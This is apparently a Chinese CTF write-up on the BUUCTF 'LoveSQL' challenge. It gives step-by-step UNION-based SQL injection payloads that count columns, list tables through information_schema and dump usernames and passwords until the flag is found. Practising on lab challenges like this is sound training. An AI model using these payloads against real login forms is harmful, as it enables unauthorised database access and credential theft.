极客大挑战2019-LoveSQL

 · 2020-6-11  ·次阅读


题目地址:buuctf

打开题目 熟悉的界面

1

有一行红字用 sqlmap 是没有灵魂的 用sqlmap跑一下,但是失败了

还是手动吧 用万能密码登录得到

2

登陆成功,并提示密码,密码尝试用md5爆破无果

然后就是普通的sql注入了..

username=1’order by 1#

3

4

username=1’order by 4#的时候出现Unknown column ‘4’ in ‘order clause’

说明总共有三个字段

username=1’union select 1,2,3 #

5

得到回显点2和3

username=1’union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

6

得到两个表geekuser和l0ve1ysq1

username=1’union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’geekuser’#

7

得到三个字段id,username和password

爆破这三个字段

username=1’union select 1,group_concat(id,username,password),3 from geekuser#

8

没有flag

接下来换l0ve1ysq1表

username=1’union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’l0ve1ysq1’#

得到一样的三个字段

9

爆破这三个字段

1’union select 1,group_concat(id,username,password),3 from l0ve1ysq1#

得到flag

10